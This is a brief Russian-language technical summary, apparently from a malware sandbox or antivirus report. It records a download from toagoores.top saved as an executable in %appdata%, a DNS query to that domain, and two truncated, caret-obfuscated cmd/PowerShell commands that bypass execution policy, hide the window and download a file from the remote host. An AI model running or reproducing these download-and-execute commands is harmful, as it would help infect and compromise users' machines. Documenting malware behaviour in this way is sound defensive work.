Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^Wersh^e^LL.E^Xe -e^xE^CUt^iO^NpolIc^y b^Yp^AsS^ -^NopRO^FIlE^ ^-wi^NdoW^sTy^Le^ H^iDd^En (^nEW-^oB^J^e^Ct^ s^Y^s^t^em.net.W^e^BCL^Ien^T).DOwnloAdF^i^l^e^('http://toagoores...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "po^Wersh^e^LL.E^Xe -e^xE^CUt^iO^NpolIc^y b^Yp^AsS^ -^NopRO^FIlE^ ^-wi^NdoW^sTy^Le^ H^iDd^En (^nEW-^oB^J^e^Ct^ s^Y^s^t^em.net.W^e^BCL^Ien^T).DOwnloAdF^i^l^e^('http://toagoores...' (со скрытым окном)